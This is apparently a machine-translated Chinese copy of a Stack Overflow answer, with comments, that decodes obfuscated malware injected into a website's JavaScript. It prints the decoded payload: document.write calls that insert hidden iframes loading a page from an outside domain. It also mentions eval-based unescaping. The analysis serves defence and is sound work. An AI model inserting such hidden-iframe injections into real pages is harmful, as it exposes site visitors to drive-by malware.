回答
一种病毒。我在字符串中包含一些带Unicode转义字符的字符串,第一个是一些html,第二个是"write"
。然后,document[arr[1]](arr[0])
执行,转化为以下几点:
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
我不知道(并不会检查)这些东西包括I帧,有可能会出现一些漏洞。
此外,代码不包含(这两个iframe的写入间)的一些功能(_1lO
和O0l
),这可能反转义IlO
字符串之前,它是eval
ED(是的,EVAL是邪恶的!:-),但有在你的pastebin片段前面有一些缺失的代码,所以我不能告诉你他们到底做了什么。你能把整个剧本给我们吗?
您可以查看链接是已知的还是怀疑是恶意软件。例如:http://www.google.com/safebrowsing/diagnostic?site=mazda.georgewkohn.com – 2012-08-05 22:31:53
@JaredFarrish:谢谢,好主意。 – Bergi 2012-08-05 22:36:17
** + 1 **优秀的答案Bergi。另外,优秀的评论Jarred! ** + 1 **,谢谢! – arttronics 2012-08-05 22:41:48
这是一个混淆的病毒。与所有这些东西的某个地方将是一个eval()。如果你想知道它究竟做了什么,你将不得不解码的部分,看看。
更有趣的是,这些东西是如何在代码中结束的。
- 1. 在我的一个类文件中找到了这个非常奇怪的PHP代码。它是什么?
- 2. 我觉得这些奇怪的代码是什么?
- 3. 什么是Visual Studio代码中的这些奇怪的空白?
- 4. 这个奇怪的一段代码,我总是在Javascript
- 5. 请解释为什么这个奇怪的javascript代码工作
- 6. 这是什么奇怪的代码符号的意思
- 7. 这段代码为什么给我一个奇怪的输出
- 8. 这是什么奇怪的C代码格式?
- 9. 为什么我的JavaScript代码表现得很奇怪?
- 10. 这个c代码中的这个奇怪的行为是什么?
- 11. 为什么在我导出的wordpress xml文件中找到奇怪的字符?
- 12. 这是什么代码在Javascript中?
- 13. 我在学习的ASPX页面中看到的这个奇怪的混淆HTML代码是什么?
- 14. 为什么这段代码在我的ListView中找不到我的文本框?
- 15. 这是什么奇怪的“结构”
- 16. 这是什么奇怪的easelJS行为?
- 17. 这个Javascript代码是什么意思? SRC看起来很奇怪
- 18. 为什么这么多网页在头文件中包含这样一个奇怪的代码片段?
- 19. 这段Javascript代码是做什么的?
- 20. 这个javascript代码是做什么的?
- 21. 为什么这个JavaScript date()很奇怪?
- 22. 在javascript中找到这行代码。它是什么类型的加密?
- 23. 这个C代码有什么问题?奇怪的错误
- 24. 为什么会产生这样奇怪的代码?
- 25. 这个奇怪的符号在JavaScript中意味着什么?
- 26. JavaScript源代码中的这些代码是什么?
- 27. 这是什么错我的JavaScript代码?它不工作在IE8
- 28. 什么是这个奇怪的JavaScript数组语法?
- 29. 奇怪的JavaScript语句,这是什么意思?
- 30. 为什么我的Time :: Piece代码给出奇怪的结果?
是的...不会点击它。 – 2012-08-05 22:21:26
@JaredFarrish,发布的链接是** pastebin **,而不是可能被感染的网站。 – arttronics 2012-08-05 22:23:13
@arttronics - 去吧。 (是的,我知道什么是pastebin。) – 2012-08-05 22:23:28